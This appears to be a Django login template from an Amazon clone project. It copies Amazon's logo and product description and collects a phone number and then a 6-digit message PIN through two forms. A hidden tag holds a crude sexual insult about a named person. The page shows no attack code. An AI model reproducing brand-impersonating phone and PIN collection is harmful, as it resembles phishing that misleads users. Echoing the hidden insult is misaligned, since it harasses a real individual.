<!DOCTYPE html>
<html lang="en">
  <head>
    {% load static %} {% load socialaccount %}
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Login To Your Account</title>
    <link rel="stylesheet" href="{% static 'home/css/login.css' %}" />
    <meta
      property="og:image"
      content="http://g-ec2.images-amazon.com/images/G/01/social/api-share/amazon_logo_500500._V323939215_.png"
      xmlns:og="http://opengraphprotocol.org/schema/"
    />
    <link
      rel="icon"
      href="{% static 'home/img/amazon-logo-favicon.png' %}"
      type="image/x-icon"
    />
    <link
      rel="shortcut icon"
      href="{% static 'home/img/amazon-logo-favicon.png' %}"
      type="image/x-icon"
    />
    <meta
      property="og:description"
      content="Free delivery on millions of items with Prime. Low prices across earth's biggest selection of books, music, DVDs, electronics, computers, software, apparel & accessories, shoes, jewelry, tools & hardware, housewares, furniture, sporting goods, beauty & personal care, groceries & just about anything else."
      xmlns:og="http://opengraphprotocol.org/schema/"
    />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  </head>
  <body>
    <div class="login">
      <img
        class="login__logo"
        src="https://upload.wikimedia.org/wikipedia/commons/thumb/a/a9/Amazon_logo.svg/1024px-Amazon_logo.svg.png"
      />
        <!-- This section wil be displayed to enter the number-->
      <div class="login__container" style="display: block;">
        <h1>Enter Your Number</h1>

        <form method="POST" action="{% url 'handlelogin' %}">
          {% csrf_token %}
          <h5>Phone Number</h5>
          <input type="text" name="loginusername" required />

          <ifuckfahad style="display: none;">That Was Amazing... he has small mora</ifuckfahad>

          <p><b>Why we need you to verify number?</b></p>

          <p style="font-size: 12px;">
            By using your number we can verify your account when ever we feel someone other then you tries to login into account, or we can send you the alert messages if some intruder tries to login your account. You can also use this number to track you order. 
          </p>

          <button type="submit" class="login__signInButton">Verify</button>
        </form>

        <button class="login__registerButton">
          Skip for Now
        </button>
      </div>
      <!-- This section will be displayed when the user have to enter the Pin
            The upper section will be invisible-->
      <div class="login__container" style="display: none;">
        <h1>Enter 6 digit Pin</h1>

        <form method="POST" action="{% url 'handlelogin' %}">
          {% csrf_token %}
          <h5>Pin</h5>
          <input type="text" name="loginusername" required />


          <p style="font-size: 12px;">You will recieve a  message with the 6 digit pin in it...</p>

        </form>
      </div>
    </div>
  </body>
</html>
